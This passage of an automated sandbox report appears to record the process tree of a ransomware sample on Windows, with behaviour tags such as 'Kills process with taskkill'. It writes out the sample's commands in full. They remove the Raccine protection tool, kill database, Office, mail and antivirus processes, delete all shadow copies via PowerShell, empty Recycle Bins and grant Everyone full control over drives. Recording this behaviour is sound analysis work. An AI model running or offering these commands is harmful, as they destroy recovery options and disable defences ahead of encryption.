  - Suspicious use of AdjustPrivilegeToken
  PID:328
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1620
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1480
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1760
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1572
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:944
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:900
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1732
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1684
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1084
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:428
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1772
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1092
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1072
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1816
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1088
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:916
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:1692
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:1616
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:428
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:576
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:852
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:1944
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:1608
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1496
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1084
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:964
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1188
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:1300
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:1976
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:276
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1576
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1776
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:944
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:976
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1760
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:1972
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:328
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:480
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:580
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:900
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1000
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1404
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:1772
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1844
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:1804
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:920
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:532
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1660
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1616
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:480
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1692
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:984
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:576
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1776
- C:\Windows\system32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:300
- C:\Windows\system32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:408
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3092.bat
  2⤵
  PID:1496
- - C:\Windows\system32\mountvol.exe
    mountvol
    3⤵
    PID:1144
- - C:\Windows\system32\find.exe
    find "}\"
    3⤵
    PID:1576
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{de9ebae3-989d-11eb-b4e6-806e6f6e6963}\
    3⤵
    PID:1804
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:980
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{de9ebae4-989d-11eb-b4e6-806e6f6e6963}\
    3⤵
    PID:1592
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1796
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{de9ebae7-989d-11eb-b4e6-806e6f6e6963}\
    3⤵
    PID:900
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1580
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1596
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:1816
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1692
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:1092
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-2455352368-1077083310-2879168483-1000\d5019152-81c9-4e4b-b0f5-80b37542e450 /grant Everyone:F /T /C /Q
  2⤵
  PID:1144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 /grant Everyone:F /T /C /Q
  2⤵
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConnectCompare.mov /grant Everyone:F /T /C /Q
  2⤵
  PID:1680
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2455352368-1077083310-2879168483-1000\0f5007522459c86e95ffcc62f32308f1_14c10c19-3a0b-4ef0-8928-af871cb14c00 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1988
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1620
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:1920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1308
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:1640
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:828
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant Everyone:F /T /C /Q
  2⤵
  PID:380
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1860
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:964
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1660
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1632
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:1588
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:2012
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:1708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:1092
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:276
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:1640
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1368
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1728
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft Help\nslist.hxl /grant Everyone:F /T /C /Q
  2⤵
  PID:596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:1484
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:156
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1632
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log /grant Everyone:F /T /C /Q
  2⤵
  PID:1864
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:1784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_15ac16619585aa27282df5e4c6acd0916524a313_cab_07747e05\DMI7DF5.tmp.log.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1976
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1580
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1728
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1940
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:1660
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1088
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000014.db /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6F95B335-B27B-43AB-99B0-FE819F4F3284}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:620
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{73B1DD16-5F6E-4703-817D-F411AA517EC7}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{A9642826-38E6-4A6F-A253-1839AB5002E3}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.chk /grant Everyone:F /T /C /Q
  2⤵
  PID:1488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1820
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs /grant Everyone:F /T /C /Q
  2⤵
  PID:1976
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb /grant Everyone:F /T /C /Q
  2⤵
  PID:1764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:1368
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:1836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:852
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:1960
- C:\Windows\system32\icacls.exe
